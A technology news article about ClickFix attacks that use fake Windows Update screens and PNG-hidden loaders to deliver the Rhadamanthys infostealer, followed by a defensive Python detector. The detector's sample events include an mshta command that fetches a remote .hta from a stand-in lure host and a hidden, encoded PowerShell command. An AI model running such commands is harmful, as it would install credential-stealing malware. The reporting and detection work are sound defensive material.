Fresh ClickFix Attacks Abuse Fake Windows Update Screens to Steal Credentials
- Chalani Himasha
- 6 hours ago
Himasha Dissanayake, JadeTimes Staff
H. Dissanayake is a Jadetimes news reporter covering Technology

Source: Schechter, Shaffer & Harris, L.L.P
A new wave of ClickFix cyberattacks is exploiting fake Windows Update screens to deceive users into installing credential-stealing malware, security researchers at Huntress report. ClickFix is a rising social-engineering tactic that convinces victims to copy and run malicious commands themselves, often disguised as "fixes" or system checks. According to Microsoft, ClickFix has become the most common method attackers use to gain initial access to a device.
Security analysts Ben Folland and Anna Pham found that recent attacks no longer rely on the "verify you are human" robot-check prompts seen in earlier ClickFix campaigns. Instead, they use a highly convincing, full-screen Windows Update page that tricks users into believing they must install a "critical update." Victims are instructed to press Win+R and paste a command into the Run box, which triggers a multi-stage infection chain.

Source: BleepingComputer
Fake Windows security update screen
The malware is delivered through a steganographic loader that hides malicious code within the pixel data of PNG images. The payload is reconstructed in memory from the image's color channels, so no recognizable malicious file ever touches disk and signature-based detection is evaded. The campaign primarily distributes the Rhadamanthys infostealer, known for stealing login credentials. Huntress linked more than 76 incidents between September 29 and October 30, 2025, affecting organizations in the US, EMEA, and APJ regions.
Although the Rhadamanthys infrastructure has been targeted by recent law enforcement efforts, active lure domains remain online, and the source code suggests Russian involvement.
Cybersecurity experts recommend that organizations block the Windows Run box, train employees to recognize ClickFix techniques, and monitor endpoints for suspicious execution chains, especially mshta.exe or powershell.exe launched from explorer.exe, which is the parent process of anything started from the Run box.
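The endpoint-monitoring advice above, turned into a small detection check. This is an added example written for this article, not Huntress or Microsoft code; the events are constructed samples in a Sysmon Event ID 1 style, and the field names, domain and encoded-command string are assumptions.

```python
# A command pasted into the Run box (Win+R) is spawned by explorer.exe, so
# mshta.exe or powershell.exe with explorer.exe as parent is the chain to
# alert on. Constructed sample events; field names are assumptions.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://lure.example.invalid/update.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -enc UExBQ0VIT0xERVI"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "CommandLine": "powershell -File build.ps1"},  # developer use, not flagged
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad"},  # benign child of explorer.exe, not flagged
]

SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe"}
RUN_BOX_PARENT = "explorer.exe"
# Command-line traits that strengthen the verdict; each adds a reason string.
CMDLINE_TRAITS = {
    "-enc": "encoded command",
    "-w hidden": "hidden window",
    "http": "remote content fetched",
}

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the reasons an event matches the ClickFix chain, or [] if it does not."""
    if basename(event["Image"]) not in SUSPICIOUS_CHILDREN:
        return []
    if basename(event["ParentImage"]) != RUN_BOX_PARENT:
        return []
    reasons = [f"{basename(event['Image'])} spawned by {RUN_BOX_PARENT}"]
    cmd = event["CommandLine"].lower()
    reasons += [why for trait, why in CMDLINE_TRAITS.items() if trait in cmd]
    return reasons

def find_clickfix_chains(events: list) -> list:
    """Return (event, reasons) pairs for every event that matches the chain."""
    return [(e, classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for event, reasons in find_clickfix_chains(SAMPLE_EVENTS):
        print(event["CommandLine"], "->", "; ".join(reasons))
```

Feeding real process-creation telemetry through `find_clickfix_chains` flags only the two Run-box-spawned children, while PowerShell started from a developer tool passes untouched.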